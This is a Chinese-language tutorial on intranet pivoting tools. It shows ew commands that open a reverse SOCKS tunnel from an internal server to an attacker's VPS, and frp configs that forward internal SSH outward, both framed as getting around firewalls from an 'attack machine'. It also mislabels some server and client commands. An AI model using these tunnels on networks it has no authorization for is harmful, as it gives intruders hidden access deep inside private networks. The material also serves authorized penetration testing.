内网代理工具

一、ew正向代理

0x01 ew介绍

该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道，直达网络深处，用蚯蚓独有的手段突破网络限制，给防火墙松土。

下载地址：

https://github.com/idlefire/ew

0x02 使用方法

服务端（vps）：

-l 本地监听端口，待会连接这个端口作为 socks5 端口

-e 反弹中转端口

./ew_for_linux64 -s rcsocks -l 1080 -e 1024

客户端（内网服务器）：

需要进行代理的内网服务器（可ping通vps）

-d 指定反弹的主机，这里为 公网 vps 的 ip

-e 指定反弹中转端口，和vps中的设置的一样

/ew_for_linux64 -s rssocks -d vps_ip -e 1024

客户端（攻击机）：

可借助proxifier工具配置攻击机全局代理（速度较慢）

也可以使用浏览器socks5代理

burpsuite也可以使用socks5代理

0x03 优缺点

优点：配置简单，相当于直接处于目标内网

缺点：速度较慢，不稳定

二、frp反向代理

0x01 frp介绍

FRP (Fast Reverse Proxy) 是一个可用于内网穿透的高性能的反向代理应用，支持 TCP ， UDP ， HTTP ， HTTPS 协议。

下载地址：

https://github.com/fatedier/frp/releases

0x02 使用方法

服务端（frps）：

一台拥有公网 IP 的设备（云服务器、VPS ……）

frps有两个配置文件，一个是frps_full.ini（完整的配置文件，一般不需要），另一个是frps.ini（这个用的多）

frpc.ini默认内容为（内容意思为将本地22号端口转发到vps的6000端口）

[common]bind_port = 7000

使用时，需将frps.ini内容更改为

bind_port = 7000                  #要绑定的代理端口dashboard_port = 7500             #控制面板管理端口token = admin@123                 #客户端frpc认证密码dashboard_user = admin            #控制面板用户名dashboard_pwd = 11111111          #控制面板密码

使用时，服务端只需运行如下命令即可

frpc -c frpc.ini

windows

frpc.exe -c frpc.ini

客户端（frpc）：

需要进行代理的内网服务器（可ping通vps）

frpc也有两个配置文件，一个是frpc_full.ini（完整的配置文件，一般不需要），另一个是frpc.ini（这个用的多）

frpc.ini默认内容为（内容意思为将本地22号端口转发到vps的6000端口）

[common]server_addr = 127.0.0.1     #服务端地址（vps地址）server_port = 7000          #服务端代理端口
[ssh]type = tcplocal_ip = 127.0.0.1local_port = 22remote_port = 6000

使用时，服务端只需运行如下命令即可

frpc -c frpc.ini

windows

frpc.exe -c frpc.ini

0x03 优缺点

优点：使用反向代理，只需要把需要访问的内网主机和端口转发出来即可，速度较快

缺点：访问https网站时配置相对复杂